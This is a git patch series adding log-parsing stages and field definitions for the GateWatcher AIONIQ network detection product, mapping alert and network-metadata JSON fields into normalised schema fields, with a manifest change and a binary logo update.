+          tls.client.server_name: '{{json_load.message.tls.client.server_name}}'
+          tls.server.certificate: '{{json_load.message.tls.server.certificate}}'
+          tls.server.hash.sha256: '{{json_load.message.tls.server.hash.sha256}}'
+          tls.server.certificate_chain: '{{json_load.message.tls.server.certificate.chain}}'
+        filter: ''
+        name: set
+  metadata-flowbits:
+    actions:
+      - set:
+          gatewatcher.metadata.flowbits: '{{json_load.message.metadata.flowbits}}'
+        filter: ''
+        name: set
+  smtp:
+    actions:
+      - set:
+          gatewatcher.smtp.helo: '{{json_load.message.smtp.helo}}'
+          gatewatcher.smtp.rcpt_to: '{{json_load.message.smtp.rcpt_to}}'
+          gatewatcher.smtp.mail_from: '{{json_load.message.smtp.mail_from}}'
+        filter: ''
+        name: set
+  email:
+    actions:
+      - set:
+          email.subject: '{{json_load.message.email.subject}}'
+          email.message_id: '{{json_load.message.email.message_id}}'
+          email.attachments: '{{json_load.message.email.attachments}}'
+          gatewatcher.email.to: '{{json_load.message.email.to}}'
+          gatewatcher.email.from: '{{json_load.message.email.from}}'
+          gatewatcher.email.status: '{{json_load.message.email.status}}'
+          gatewatcher.email.body_md5: '{{json_load.message.email.body_md5}}'
+          gatewatcher.email.subject_md5: '{{json_load.message.email.subject_md5}}'
+        filter: ''
+        name: set
+  smb:
+    actions:
+      - set:
+          gatewatcher.smb.id: '{{json_load.message.smb.id}}'
+          gatewatcher.smb.status: '{{json_load.message.smb.status}}'
+          gatewatcher.smb.command: '{{json_load.message.smb.command}}'
+          gatewatcher.smb.dialect: '{{json_load.message.smb.dialect}}'
+          gatewatcher.smb.tree_id: '{{json_load.message.smb.tree_id}}'
+          gatewatcher.smb.session_id: '{{json_load.message.smb.session_id}}'
+          gatewatcher.smb.status_code: '{{json_load.message.smb.status_code}}'
+        filter: ''
+        name: set
+  nfs:
+    actions:
+      - set:
+          gatewatcher.nfs.id: '{{json_load.message.nfs.id}}'
+          gatewatcher.nfs.type: '{{json_load.message.nfs.type}}'
+          gatewatcher.nfs.hhash: '{{json_load.message.nfs.hhash}}'
+          gatewatcher.nfs.status: '{{json_load.message.nfs.status}}'
+          gatewatcher.nfs.file_tx: '{{json_load.message.nfs.file_tx}}'
+          gatewatcher.nfs.version: '{{json_load.message.nfs.version}}'
+          gatewatcher.nfs.filename: '{{json_load.message.nfs.filename}}'
+          gatewatcher.nfs.procedure: '{{json_load.message.nfs.procedure}}'
+        filter: ''
+        name: set
+  ftp:
+    actions:
+      - set:
+          gatewatcher.ftp.reply: '{{json_load.message.ftp.reply}}'
+          gatewatcher.ftp.reply_received: '{{json_load.message.ftp.reply_received}}'
+          gatewatcher.ftp.completion_code: '{{json_load.message.ftp.completion_code}}'
+          gatewatcher.ftp.reply_truncated: '{{json_load.message.ftp.reply_truncated}}'
+        filter: ''
+        name: set
+  tftp:
+    actions:
+      - set:
+          gatewatcher.tftp.file: '{{json_load.message.tftp.file}}'
+          gatewatcher.tftp.mode: '{{json_load.message.tftp.mode}}'
+          gatewatcher.tftp.packet: '{{json_load.message.tftp.packet}}'
+        filter: ''
+        name: set
+  ssh:
+    actions:
+      - set:
+          gatewatcher.ssh.client.hassh: '{{json_load.message.ssh.client.hassh}}'
+          gatewatcher.ssh.server.hassh: '{{json_load.message.ssh.server.hassh}}'
+          gatewatcher.ssh.client.proto_version: '{{json_load.message.ssh.client.proto_version}}'
+          gatewatcher.ssh.server.proto_version: '{{json_load.message.ssh.server.proto_version}}'
+          gatewatcher.ssh.client.software_version: '{{json_load.message.ssh.client.software_version}}'
+          gatewatcher.ssh.server.software_version: '{{json_load.message.ssh.server.software_version}}'
+        filter: ''
+        name: set
+  krb5:
+    actions:
+      - set:
+          gatewatcher.krb5.cname: '{{json_load.message.krb5.cname}}'
+          gatewatcher.krb5.realm: '{{json_load.message.krb5.realm}}'
+          gatewatcher.krb5.sname: '{{json_load.message.krb5.sname}}'
+          gatewatcher.krb5.msg_type: '{{json_load.message.krb5.msg_type}}'
+          gatewatcher.krb5.encryption: '{{json_load.message.krb5.encryption}}'
+          gatewatcher.krb5.error_code: '{{json_load.message.krb5.error_code}}'
+          gatewatcher.krb5.failed_request: '{{json_load.message.krb5.failed_request}}'
+          gatewatcher.krb5.weak_encryption: '{{json_load.message.krb5.weak_encryption}}'
+        filter: ''
+        name: set
+  dhcp:
+    actions:
+      - set:
+          gatewatcher.dhcp.id: '{{json_load.message.dhcp.id}}'
+          gatewatcher.dhcp.type: '{{json_load.message.dhcp.type}}'
+          gatewatcher.dhcp.routers: '{{json_load.message.dhcp.routers}}'
+          gatewatcher.dhcp.hostname: '{{json_load.message.dhcp.hostname}}'
+          gatewatcher.dhcp.relay_ip: '{{json_load.message.dhcp.relay_ip}}'
+          gatewatcher.dhcp.client_ip: '{{json_load.message.dhcp.client_ip}}'
+          gatewatcher.dhcp.dhcp_type: '{{json_load.message.dhcp.dhcp_type}}'
+          gatewatcher.dhcp.client_mac: '{{json_load.message.dhcp.client_mac}}'
+          gatewatcher.dhcp.lease_time: '{{json_load.message.dhcp.lease_time}}'
+          gatewatcher.dhcp.assigned_ip: '{{json_load.message.dhcp.assigned_ip}}'
+          gatewatcher.dhcp.dns_servers: '{{json_load.message.dhcp.dns_servers}}'
+          gatewatcher.dhcp.subnet_mask: '{{json_load.message.dhcp.subnet_mask}}'
+          gatewatcher.dhcp.next_server_ip: '{{json_load.message.dhcp.next_server_ip}}'
+        filter: ''
+        name: set
+  ftp_data:
+    actions:
+      - set:
+          gatewatcher.ftp_data.command: '{{json_load.message.ftp_data.command}}'
+          gatewatcher.ftp_data.filename: '{{json_load.message.ftp_data.filename}}'
+        filter: ''
+        name: set
+  snmp:
+    actions:
+      - set:
+          gatewatcher.snmp.vars: '{{json_load.message.snmp.vars}}'
+          gatewatcher.snmp.version: '{{json_load.message.snmp.version}}'
+          gatewatcher.snmp.pdu_type: '{{json_load.message.snmp.pdu_type}}'
+          gatewatcher.snmp.community: '{{json_load.message.snmp.community}}'
+        filter: ''
+        name: set
+  rdp:
+    actions:
+      - set:
+          gatewatcher.rdp.tx_id: '{{json_load.message.rdp.tx_id}}'
+          gatewatcher.rdp.client: '{{json_load.message.rdp.client}}'
+          gatewatcher.rdp.cookie: '{{json_load.message.rdp.cookie}}'
+          gatewatcher.rdp.channels: '{{json_load.message.rdp.channels}}'
+          gatewatcher.rdp.protocol: '{{json_load.message.rdp.protocol}}'
+          gatewatcher.rdp.event_type: '{{json_load.message.rdp.event_type}}'
+          gatewatcher.rdp.server_supports: '{{json_load.message.rdp.server_supports}}'
+        filter: ''
+        name: set
+  rfb:
+    actions:
+      - set:
+          gatewatcher.rfb.authentication: '{{json_load.message.rfb.authentication}}'
+          gatewatcher.rfb.client_protocol_version: '{{json_load.message.rfb.client_protocol_version}}'
+          gatewatcher.rfb.server_protocol_version: '{{json_load.message.rfb.server_protocol_version}}'
+          gatewatcher.rfb.server_security_failure_reason: '{{json_load.message.rfb.server_security_failure_reason}}'
+        filter: ''
+        name: set
+  ikev2:
+    actions:
+      - set:
+          gatewatcher.ikev2.role: '{{json_load.message.ikev2.role}}'
+          gatewatcher.ikev2.errors: '{{json_load.message.ikev2.errors}}'
+          gatewatcher.ikev2.notify: '{{json_load.message.ikev2.notify}}'
+          gatewatcher.ikev2.payload: '{{json_load.message.ikev2.payload}}'
+          gatewatcher.ikev2.init_spi: '{{json_load.message.ikev2.init_spi}}'
+          gatewatcher.ikev2.resp_spi: '{{json_load.message.ikev2.resp_spi}}'
+          gatewatcher.ikev2.message_id: '{{json_load.message.ikev2.message_id}}'
+          gatewatcher.ikev2.exchange_type: '{{json_load.message.ikev2.exchange_type}}'
+          gatewatcher.ikev2.version_major: '{{json_load.message.ikev2.version_major}}'
+          gatewatcher.ikev2.version_minor: '{{json_load.message.ikev2.version_minor}}'
+        filter: ''
+        name: set
+  sip:
+    actions:
+      - set:
+          gatewatcher.sip.uri: '{{json_load.message.sip.uri}}'
+          gatewatcher.sip.method: '{{json_load.message.sip.method}}'
+          gatewatcher.sip.version: '{{json_load.message.sip.version}}'
+          gatewatcher.sip.request_line: '{{json_load.message.sip.request_line}}'
+        filter: ''
+        name: set
+  dnp3:
+    actions:
+      - set:
+          gatewatcher.dnp3.dst: '{{json_load.message.dnp3.dst}}'
+          gatewatcher.dnp3.iin: '{{json_load.message.dnp3.iin}}'
+          gatewatcher.dnp3.src: '{{json_load.message.dnp3.src}}'
+          gatewatcher.dnp3.type: '{{json_load.message.dnp3.type}}'
+          gatewatcher.dnp3.control: '{{json_load.message.dnp3.control}}'
+          gatewatcher.dnp3.application: '{{json_load.message.dnp3.application}}'
+        filter: ''
+        name: set
+  dcerpc:
+    actions:
+      - set:
+          gatewatcher.dcerpc.req: '{{json_load.message.dcerpc.req}}'
+          gatewatcher.dcerpc.res: '{{json_load.message.dcerpc.res}}'
+          gatewatcher.dcerpc.call_id: '{{json_load.message.dcerpc.call_id}}'
+          gatewatcher.dcerpc.request: '{{json_load.message.dcerpc.request}}'
+          gatewatcher.dcerpc.response: '{{json_load.message.dcerpc.response}}'
+          gatewatcher.dcerpc.interfaces: '{{json_load.message.dcerpc.interfaces}}'
+          gatewatcher.dcerpc.rpc_version: '{{json_load.message.dcerpc.rpc_version}}'
+        filter: ''
+        name: set
+  mqtt:
+    actions:
+      - set:
+          gatewatcher.mqtt.connack: '{{json_load.message.mqtt.connack}}'
+        filter: ''
+        name: set
+  malcore:
+    actions:
+      - set:
+          gatewatcher.malcore.code: '{{json_load.message.malcore.code}}'
+          gatewatcher.malcore.state: '{{json_load.message.malcore.state}}'
+          gatewatcher.malcore.engine_id: '{{json_load.message.malcore.engine_id}}'
+          gatewatcher.malcore.file_type: '{{json_load.message.malcore.file_type}}'
+          gatewatcher.malcore.total_found: '{{json_load.message.malcore.total_found}}'
+          gatewatcher.malcore.analyzers_up: '{{json_load.message.malcore.analyzers_up}}'
+          gatewatcher.malcore.magic_details: '{{json_load.message.malcore.magic_details}}'
+          gatewatcher.malcore.analyzed_clean: '{{json_load.message.malcore.analyzed_clean}}'
+          gatewatcher.malcore.analyzed_error: '{{json_load.message.malcore.analyzed_error}}'
+          gatewatcher.malcore.analyzed_other: '{{json_load.message.malcore.analyzed_other}}'
+          gatewatcher.malcore.processing_time: '{{json_load.message.malcore.processing_time}}'
+          gatewatcher.malcore.reporting_token: '{{json_load.message.malcore.reporting_token}}'
+          gatewatcher.malcore.detail_scan_time: '{{json_load.message.malcore.detail_scan_time}}'
+          gatewatcher.malcore.detail_wait_time: '{{json_load.message.malcore.detail_wait_time}}'
+          gatewatcher.malcore.analyzed_infected: '{{json_load.message.malcore.analyzed_infected}}'
+          gatewatcher.malcore.analyzed_suspicious: '{{json_load.message.malcore.analyzed_suspicious}}'
+          gatewatcher.malcore.detail_threat_found: '{{json_load.message.malcore.detail_threat_found}}'
+          gatewatcher.malcore.file_type_description: '{{json_load.message.malcore.file_type_description}}'
+          gatewatcher.malcore.engines_last_update_date: '{{json_load.message.malcore.engines_last_update_date}}'
+        filter: ''
+        name: set
+  sigflow:
+    actions:
+      - set:
+          gatewatcher.sigflow.gid: '{{json_load.message.sigflow.gid}}'
+          gatewatcher.sigflow.rev: '{{json_load.message.sigflow.rev}}'
+          gatewatcher.sigflow.action: '{{json_load.message.sigflow.action}}'
+          gatewatcher.sigflow.packet: '{{json_load.message.sigflow.packet}}'
+          gatewatcher.sigflow.stream: '{{json_load.message.sigflow.stream}}'
+          gatewatcher.sigflow.payload: '{{json_load.message.sigflow.payload}}'
+          gatewatcher.sigflow.category: '{{json_load.message.sigflow.category}}'
+          gatewatcher.sigflow.metadata: '{{json_load.message.sigflow.metadata}}'
+          gatewatcher.sigflow.signature: '{{json_load.message.sigflow.signature}}'
+          gatewatcher.sigflow.packet_info: '{{json_load.message.sigflow.packet_info}}'
+          gatewatcher.sigflow.signature_id: '{{json_load.message.sigflow.signature_id}}'
+          gatewatcher.sigflow.payload_printable: '{{json_load.message.sigflow.payload_printable}}'
+        filter: ''
+        name: set
+  flow:
+    actions:
+      - set:
+          gatewatcher.flow.start: '{{json_load.message.flow.start}}'
+          gatewatcher.flow.pkts_toclient: '{{json_load.message.flow.pkts_toclient}}'
+          gatewatcher.flow.pkts_toserver: '{{json_load.message.flow.pkts_toserver}}'
+          gatewatcher.flow.bytes_toclient: '{{json_load.message.flow.bytes_toclient}}'
+          gatewatcher.flow.bytes_toserver: '{{json_load.message.flow.bytes_toserver}}'
+        filter: ''
+        name: set
+  shellcode:
+    actions:
+      - set:
+          gatewatcher.shellcode.id: '{{json_load.message.shellcode.id}}'
+          gatewatcher.shellcode.analysis: '{{json_load.message.shellcode.analysis}}'
+          gatewatcher.shellcode.sub_type: '{{json_load.message.shellcode.sub_type}}'
+          gatewatcher.shellcode.encodings: '{{json_load.message.shellcode.encodings}}'
+          gatewatcher.shellcode.sample_id: '{{json_load.message.shellcode.sample_id}}'
+        filter: ''
+        name: set
+  malicious_powershell:
+    actions:
+      - set:
+          gatewatcher.malicious_powershell.id: '{{json_load.message.malicious_powershell.id}}'
+          gatewatcher.malicious_powershell.score: '{{json_load.message.malicious_powershell.score}}'
+          gatewatcher.malicious_powershell.sample_id: '{{json_load.message.malicious_powershell.sample_id}}'
+          gatewatcher.malicious_powershell.score_details: '{{json_load.message.malicious_powershell.score_details}}'
+          gatewatcher.malicious_powershell.proba_obfuscated: '{{json_load.message.malicious_powershell.proba_obfuscated}}'
+        filter: ''
+        name: set
+  files:
+    actions:
+      - set:
+          gatewatcher.files: '{{json_load.message.files}}'
+        filter: ''
+        name: set
+  history:
+    actions:
+      - set:
+          gatewatcher.history.id: '{{json_load.message.history.id}}'
+          gatewatcher.history.ip: '{{json_load.message.history.ip}}'
+          gatewatcher.history.code: '{{json_load.message.history.code}}'
+          gatewatcher.history.name: '{{json_load.message.history.name}}'
+          gatewatcher.history.type: '{{json_load.message.history.type}}'
+          gatewatcher.history.method: '{{json_load.message.history.method}}'
+          gatewatcher.history.content: '{{json_load.message.history.content}}'
+          gatewatcher.history.endpoint: '{{json_load.message.history.endpoint}}'
+        filter: ''
+        name: set
+  syslog:
+    actions:
+      - set:
+          log.syslog.appname: '{{json_load.message.log.syslog.appname}}'
+          log.syslog.priority: '{{json_load.message.log.syslog.priority}}'
+          log.syslog.facility.code: '{{json_load.message.log.syslog.facility.code}}'
+          log.syslog.facility.name: '{{json_load.message.log.syslog.facility.name}}'
+          log.syslog.severity.code: '{{json_load.message.log.syslog.severity.code}}'
+          log.syslog.severity.name: '{{json_load.message.log.syslog.severity.name}}'
+          gatewatcher.syslog.message: '{{json_load.message.syslog.message}}'
+        filter: ''
+        name: set
+  notification:
+    actions:
+      - set:
+          gatewatcher.notification.risk: '{{json_load.message.notification.risk}}'
+          gatewatcher.notification.title: '{{json_load.message.notification.title}}'
+          gatewatcher.notification.details: '{{json_load.message.notification.details}}'
+          gatewatcher.notification.component: '{{json_load.message.notification.component}}'
+          gatewatcher.notification.resolution: '{{json_load.message.notification.resolution}}'
+          gatewatcher.notification.description: '{{json_load.message.notification.description}}'
+          gatewatcher.notification.external_redirection: '{{json_load.message.notification.external_redirection}}'
+          gatewatcher.notification.internal_redirection: '{{json_load.message.notification.internal_redirection}}'
+        filter: ''
+        name: set
+  beacon:
+    actions:
+      - set:
+          gatewatcher.beacon.id: '{{json_load.message.beacon.external_redirection}}'
+          gatewatcher.beacon.type: '{{json_load.message.beacon.type}}'
+          gatewatcher.beacon.active: '{{json_load.message.beacon.active}}'
+          gatewatcher.beacon.possible_cnc: '{{json_load.message.beacon.possible_cnc}}'
+          gatewatcher.beacon.session_count: '{{json_load.message.beacon.session_count}}'
+          gatewatcher.beacon.mean_time_interval: '{{json_load.message.beacon.mean_time_interval}}'
+          gatewatcher.beacon.hostname_resolution: '{{json_load.message.beacon.hostname_resolution}}'
+        filter: ''
+        name: set
+  retrohunt:
+    actions:
+      - set:
+          gatewatcher.matched_event.id: '{{json_load.message.matched_event.id}}'
+          gatewatcher.matched_event.file.sid: '{{json_load.message.matched_event.file.sid}}'
+          gatewatcher.matched_event.file.gaps: '{{json_load.message.matched_event.file.gaps}}'
+          gatewatcher.matched_event.file.name: '{{json_load.message.matched_event.file.name}}'
+          gatewatcher.matched_event.file.size: '{{json_load.message.matched_event.file.size}}'
+          gatewatcher.matched_event.file.magic: '{{json_load.message.matched_event.file.magic}}'
+          gatewatcher.matched_event.file.state: '{{json_load.message.matched_event.file.state}}'
+          gatewatcher.matched_event.file.tx_id: '{{json_load.message.matched_event.file.tx_id}}'
+          gatewatcher.matched_event.file.stored: '{{json_load.message.matched_event.file.stored}}'
+          gatewatcher.matched_event.file.hash.md5: '{{json_load.message.matched_event.file.hash.md5}}'
+          gatewatcher.matched_event.file.hash.sha256: '{{json_load.message.matched_event.file.hash.sha256}}'
+        filter: ''
+        name: set
+  ransomware_detect:
+    actions:
+      - set:
+          gatewatcher.ransomware.session_score: '{{json_load.message.ransomware.session_score}}'
+          gatewatcher.ransomware.alert_threshold: '{{json_load.message.ransomware.alert_threshold}}'
+          gatewatcher.ransomware.malicious_behavior_confidence: '{{json_load.message.ransomware.malicious_behavior_confidence}}'
+        filter: ''
+        name: set
+  dga_detect:
+    actions:
+      - set:
+          gatewatcher.dga.top_DGA: '{{json_load.message.dga.top_DGA}}'
+          gatewatcher.dga.dga_count: '{{json_load.message.dga.dga_count}}'
+          gatewatcher.dga.dga_ratio: '{{json_load.message.dga.dga_ratio}}'
+          gatewatcher.dga.nx_domain_count: '{{json_load.message.dga.nx_domain_count}}'
+          gatewatcher.dga.malware_behavior_confidence: '{{json_load.message.dga.malware_behavior_confidence}}'
+        filter: ''
+        name: set
+  network_behavior_analytics:
+    actions:
+      - set:
+          gatewatcher.nba.gid: '{{json_load.message.nba.gid}}'
+          gatewatcher.nba.rev: '{{json_load.message.nba.rev}}'
+          gatewatcher.nba.action: '{{json_load.message.nba.action}}'
+          gatewatcher.nba.packet: '{{json_load.message.nba.packet}}'
+          gatewatcher.nba.stream: '{{json_load.message.nba.stream}}'
+          gatewatcher.nba.payload: '{{json_load.message.nba.payload}}'
+          gatewatcher.nba.category: '{{json_load.message.nba.category}}'
+          gatewatcher.nba.signature: '{{json_load.message.nba.signature}}'
+          gatewatcher.nba.signature_id: '{{json_load.message.nba.signature_id}}'
+          gatewatcher.nba.payload_printable: '{{json_load.message.nba.payload_printable}}'
+          gatewatcher.nba.metadata.performance_impact: '{{json_load.message.nba.metadata.performance_impact}}'
+          gatewatcher.nba.metadata.signature_severity: '{{json_load.message.nba.metadata.signature_severity}}'
+        filter: ''
+        name: set
+  ioc:
+    actions:
+      - set:
+          gatewatcher.ioc.tlp: '{{json_load.message.ioc.tlp}}'
+          gatewatcher.ioc.tags: '{{json_load.message.ioc.tags}}'
+          gatewatcher.ioc.type: '{{json_load.message.ioc.type}}'
+          gatewatcher.ioc.value: '{{json_load.message.ioc.value}}'
+          gatewatcher.ioc.case_id: '{{json_load.message.ioc.case_id}}'
+          gatewatcher.ioc.families: '{{json_load.message.ioc.families}}'
+          gatewatcher.ioc.campaigns: '{{json_load.message.ioc.campaigns}}'
+          gatewatcher.ioc.relations: '{{json_load.message.ioc.relations}}'
+          gatewatcher.ioc.signature: '{{json_load.message.ioc.signature}}'
+          gatewatcher.ioc.categories: '{{json_load.message.ioc.categories}}'
+          gatewatcher.ioc.usage_mode: '{{json_load.message.ioc.usage_mode}}'
+          gatewatcher.ioc.description: '{{json_load.message.ioc.description}}'
+          gatewatcher.ioc.package_date: '{{json_load.message.ioc.package_date}}'
+          gatewatcher.ioc.threat_actor: '{{json_load.message.ioc.threat_actor}}'
+          gatewatcher.ioc.updated_date: '{{json_load.message.ioc.updated_date}}'
+          gatewatcher.ioc.creation_date: '{{json_load.message.ioc.creation_date}}'
+          gatewatcher.ioc.meta_data.cwe: '{{json_load.message.ioc.meta_data.cwe}}'
+          gatewatcher.ioc.external_links: '{{json_load.message.ioc.external_links}}'
+          gatewatcher.ioc.targeted_sectors: '{{json_load.message.ioc.targeted_sectors}}'
+          gatewatcher.ioc.kill_chain_phases: '{{json_load.message.ioc.kill_chain_phases}}'
+          gatewatcher.ioc.targeted_countries: '{{json_load.message.ioc.targeted_countries}}'
+          gatewatcher.ioc.targeted_platforms: '{{json_load.message.ioc.targeted_platforms}}'
+          gatewatcher.ioc.meta_data.usageMode: '{{json_load.message.ioc.meta_data.usageMode}}'
+          gatewatcher.ioc.meta_data.descriptions: '{{json_load.message.ioc.meta_data.descriptions}}'
+          gatewatcher.ioc.targeted_organizations: '{{json_load.message.ioc.targeted_organizations}}'
+        filter: ''
+        name: set
+

From d3dee085d138a994e01955da45f52d60d53b4551 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Mon, 9 Sep 2024 17:46:36 +0200
Subject: [PATCH 008/317] V102 legacy: new custom fields, squared logo and new
 uuid for the manifest

---
 GateWatcher/aioniq/_meta/fields.yml   | 331 ++++++++++++++++++++++++++
 GateWatcher/aioniq/_meta/logo.png     | Bin 16628 -> 41006 bytes
 GateWatcher/aioniq/_meta/manifest.yml |   2 +-
 3 files changed, 332 insertions(+), 1 deletion(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 45bc85ac2..d34cd4696 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -77,3 +77,334 @@ gatewatcher.type:
   description: Type of analysis
   name: gatewatcher.type
   type: keyword
+
+gatewatcher.calls:
+  description: This field represents the list of calls detected in a shellcode
+  name: gatewatcher.calls
+  type: text
+
+gatewatcher.campaigns:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.campaigns
+  type: text
+
+gatewatcher.case_id:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.case_id
+  type: text
+
+gatewatcher.categories:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.categories
+  type: text
+
+gatewatcher.description:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.description
+  type: text
+
+gatewatcher.dhcp:
+  description: This field represents the dhcp field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.dhcp
+  type: text
+
+gatewatcher.dnp3:
+  description: This field represents the dnp3 field in a suricata alert (used in legacy
+    format log)
+  name: gatewatcher.dnp3
+  type: text
+
+gatewatcher.domain_name:
+  description: This field represents the domain name found in a dga alert
+  name: gatewatcher.domain_name
+  type: text
+
+gatewatcher.encodings:
+  description: This field represents the encodings used in the shellcode
+  name: gatewatcher.encodings
+  type: text
+
+gatewatcher.external_links:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.external_links
+  type: text
+
+gatewatcher.families:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.families
+  type: text
+
+gatewatcher.fileinfo:
+  description: This field represents the fileinfo field in a malcore alert (used in
+    legacy format log)
+  name: gatewatcher.fileinfo
+  type: text
+
+gatewatcher.filemagic:
+  description: This field represents the magic of a file info
+  name: gatewatcher.filemagic
+  type: text
+
+gatewatcher.ftp:
+  description: This field represents the ftp field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.ftp
+  type: text
+
+gatewatcher.ftp_data:
+  description: This field represents the ftp-data field in a network metadata (used
+    in legacy format log)
+  name: gatewatcher.ftp_data
+  type: text
+
+gatewatcher.http2:
+  description: This field represents the http2 field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.http2
+  type: text
+
+gatewatcher.ikev2:
+  description: This field represents the ikev2 field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.ikev2
+  type: text
+
+gatewatcher.ioc_creation_date:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.ioc_creation_date
+  type: text
+
+gatewatcher.ioc_id:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.ioc_id
+  type: text
+
+gatewatcher.ioc_tags:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.ioc_tags
+  type: text
+
+gatewatcher.ioc_type:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.ioc_type
+  type: text
+
+gatewatcher.ioc_updated_date:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.ioc_updated_date
+  type: text
+
+gatewatcher.ioc_value:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.ioc_value
+  type: text
+
+gatewatcher.kill_chain_phases:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.kill_chain_phases
+  type: text
+
+gatewatcher.krb5:
+  description: This field represents the krb5 field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.krb5
+  type: text
+
+gatewatcher.matched_event:
+  description: This field represents the matched event found in a dga and retrohunt
+    alert
+  name: gatewatcher.matched_event
+  type: text
+
+gatewatcher.matched_event_type:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.matched_event_type
+  type: text
+
+gatewatcher.meta_data:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.meta_data
+  type: text
+
+gatewatcher.mqtt:
+  description: This field represents the mqtt field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.mqtt
+  type: text
+
+gatewatcher.nfs:
+  description: This field represents the nfs field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.nfs
+  type: text
+
+gatewatcher.payload:
+  description: This field represents the payload in a suricata alert
+  name: gatewatcher.payload
+  type: text
+
+gatewatcher.payload_printable:
+  description: This field represents the human readable payload in a suricata alert
+  name: gatewatcher.payload_printable
+  type: text
+
+gatewatcher.probability:
+  description: This field represents the probability found in a dga and retrohunt
+    alert
+  name: gatewatcher.probability
+  type: float
+
+gatewatcher.rdp:
+  description: This field represents the rdp field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.rdp
+  type: text
+
+gatewatcher.relations:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.relations
+  type: text
+
+gatewatcher.rfb:
+  description: This field represents the rfb field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.rfb
+  type: text
+
+gatewatcher.risk:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.risk
+  type: text
+
+gatewatcher.rpc:
+  description: This field represents the rpc field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.rpc
+  type: text
+
+gatewatcher.sample_id:
+  description: Matching legacy file_id with ECS sample_id
+  name: gatewatcher.sample_id
+  type: text
+
+gatewatcher.scores.analysis:
+  description: test-scores
+  name: gatewatcher.scores.analysis
+  type: number
+
+gatewatcher.scores.analysis_detailed:
+  description: test-scores
+  name: gatewatcher.scores.analysis_detailed
+  type: text
+
+gatewatcher.scores.proba_obfuscated:
+  description: test-scores
+  name: gatewatcher.scores.proba_obfuscated
+  type: float
+
+gatewatcher.signature:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.signature
+  type: text
+
+gatewatcher.sip:
+  description: This field represents the sip field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.sip
+  type: text
+
+gatewatcher.smb:
+  description: This field represents the smb field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.smb
+  type: text
+
+gatewatcher.smtp_email:
+  description: This field is used for smtp alerts
+  name: gatewatcher.smtp_email
+  type: text
+
+gatewatcher.snmp:
+  description: This field represents the snmp field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.snmp
+  type: text
+
+gatewatcher.ssh:
+  description: This field represents the ssh field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.ssh
+  type: text
+
+gatewatcher.stats:
+  description: This field represents the metrics stats
+  name: gatewatcher.stats
+  type: text
+
+gatewatcher.sub_type:
+  description: Sub type of codebreaker exploit
+  name: gatewatcher.sub_type
+  type: text
+
+gatewatcher.targeted_countries:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.targeted_countries
+  type: text
+
+gatewatcher.targeted_organizations:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.targeted_organizations
+  type: text
+
+gatewatcher.targeted_platforms:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.targeted_platforms
+  type: text
+
+gatewatcher.targeted_sectors:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.targeted_sectors
+  type: text
+
+gatewatcher.tftp:
+  description: This field represents the tftp field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.tftp
+  type: text
+
+gatewatcher.threat_actor:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.threat_actor
+  type: text
+
+gatewatcher.timestamp_package:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.timestamp_package
+  type: text
+
+gatewatcher.tlp:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.tlp
+  type: text
+
+gatewatcher.tls:
+  description: This field represents the tls field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.tls
+  type: text
+
+gatewatcher.ttp:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.ttp
+  type: text
+
+gatewatcher.usage_mode:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.usage_mode
+  type: text
+
+gatewatcher.vulnerabilities:
+  description: This field is used for retrohunt alerts
+  name: gatewatcher.vulnerabilities
+  type: text
diff --git a/GateWatcher/aioniq/_meta/logo.png b/GateWatcher/aioniq/_meta/logo.png
index f8b45a6a754e6f75f7bbb1c2e2d8a40a08c67aae..e933991caac7b495a081feda9ea336915ebd779f 100644
GIT binary patch
literal 41006
zcmeFXWmKHa5-ki2PH=a3cXu7!-F@&dxVr`q?m>bk5ZoaoKybI<1PJbKck&)z-~Dse
z`tH923~Qe5s@+w)tNZD$?pSqIc~oQ~WGE;oRG@;4CKMDj%byP-Jfy@oFwqkV3a{Bu
zTi-*|!kfa)-PIQ4WJBTM>t;h?;{&pVg7R4|%K^Dl3%W(VZsUl-G=Fm^sln_HO*%c*
